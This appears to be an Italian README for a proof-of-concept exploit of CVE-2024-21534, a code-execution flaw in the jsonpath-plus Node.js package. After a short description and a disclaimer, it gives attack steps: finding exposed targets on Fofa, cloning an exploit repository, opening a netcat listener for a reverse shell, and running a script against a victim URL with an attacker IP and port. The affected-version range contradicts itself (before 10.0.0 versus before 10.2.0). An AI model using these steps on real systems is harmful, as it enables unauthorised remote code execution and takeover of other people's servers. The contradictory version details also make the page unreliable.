
POC - CVE-2024-21534 Jsonpath-plus vulnerabile all'esecuzione di codice in remoto (RCE) a causa di una sanificazione degli input non corretta
CVE-2024-21534 è una vulnerabilità critica riscontrata nelle versioni del pacchetto jsonpath-plus precedenti alla versione 10.0.0. La vulnerabilità deriva da una sanificazione inadeguata dell'input, che può portare a Remote Code Execution (RCE) sui sistemi interessati. Questa vulnerabilità è particolarmente pericolosa perché può essere sfruttata senza autenticazione, consentendo agli aggressori di eseguire codice arbitrario sul server inviando input appositamente predisposti. Il problema nasce dall'uso predefinito non sicuro del modulo vm di Node.js che, se sfruttato, potrebbe compromettere l'intero sistema.
Versioni di jsonpath-plus precedenti alla 10.2.0
La vulnerabilità risiede nel pacchetto jsonpath-plus, ampiamente utilizzato per interrogare strutture dati JSON nelle applicazioni. Il difetto è dovuto a una sanificazione inadeguata dell'input, che consente l'esecuzione di codice dannoso.
Leggi di più — CVE-2024-21534
Disclaimer: Questo Proof of Concept (POC) è realizzato esclusivamente per scopi educativi e di test etici. L'uso di questo strumento per attaccare obiettivi senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per eventuali usi impropri o danni causati da questo programma.
Per trovare potenziali target, utilizza Fofa (simile a Shodan.io):
Jsonpath-plus
Per prima cosa, clona il repository:
git clone https://github.com/verylazytech/CVE-2024-21534
Ora apri un listener usando nc:
nc -lnvp 443
Esegui l'Exploit:
Assicurati che l'URL punti a un endpoint che elabora l'input utente tramite il pacchetto jsonpath-plus vulnerabile, in modo da consentire lo sfruttamento della vulnerabilità RCE.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

